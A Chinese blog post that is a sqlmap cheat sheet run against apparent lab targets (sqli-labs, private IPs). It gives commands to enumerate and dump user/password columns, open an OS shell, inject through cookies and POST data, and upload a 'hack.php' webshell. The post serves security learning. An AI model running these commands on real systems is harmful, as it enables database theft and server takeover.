梦の博客 欢迎来到我的破站
歌曲封面 未知作品

网站已运行 362 天 18 小时 1 分

Powered by Typecho & Sunny

5 online · 52 ms

Title

sqlmap的使用

云梦

·

Article
⚠️ 本文最后更新于2023年06月08日,已经过了324天没有更新,若内容或图片失效,请留言反馈

(1) 查找爆破的漏洞点
lhuemabl.png
发现加了 ?id=1后内容报错,说明这里有个sql漏洞。

(2) 查看数据库的所有库名

♾️ haml 代码:
sqlmap -u "http://192.168.3.9:55555/Less-5/?id=1" --dbs
#sqlmap -u url -dbs查看数据库名

查看当前数据库的库名

♾️ abap 代码:
sqlmap -u "http://192.168.3.9:55555/Less-5/?id=1" --current-db
sqlmap -u <target-url> --current-db #--current-db选项来查询当前数据库的名称。

(3) 查看对应数据库中的数据表

♾️ haml 代码:
sqlmap -u "http://192.168.3.9:55555/Less-5/?id=1" -D "root" --tables
#sqlmap -u url -D "数据库名" -tables查看对应数据库中的数据表

(4) 查看对应字段

♾️ haml 代码:
sqlmap -u "http://192.168.3.9:55555/Less-5/?id=1" -D "root" -T "users" --columns
#sqlmap -u url -D "数据库名" -T "表名" -columns查看对应字段

(5) 查看对应字段的值

♾️ haml 代码:
sqlmap -u "http://192.168.3.9:55555/Less-5/?id=1" -D "root" -T "users" -C "user,password" --dump
##sqlmap -u url -D "数据库名" -T "表名" -C “列名”-dump 查看对应字段的值

(6) 直接获取shell

♾️ haml 代码:
sqlmap -d "mysql://root:123456@192.168.1.1:3306/mysql" --os-shell
##sqlmap -d "mysql://用户名:密码@ip:端口/库名" -os-shell直接获取shell

(7) cookie注入

♾️ abap 代码:
sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  #存在漏洞

这种针对要登陆状态才有sql注入漏洞的。

(8) POST注入

♾️ abap 代码:
sqlmap -u "http://172.16.5.117/results.php" --data "search=1" -dbs

"--data "search=1":--data 选项用于指定 POST 请求的数据。这里的数据是 "search=1",表示以 POST 方式发送名为 "search" 的参数,值为 "1"。

(9) shell注入

♾️ abap 代码:
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./hack.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

--file-write:去读取文件(hack.php)
--file-dest:后面加目标的绝对路径 已经生成木马的名称(hack.php)

现在已有 0 条评论,0 人点赞
Comment
发表
搜 索 消 息 足 迹
你还不曾留言过..
你还不曾留下足迹..
博主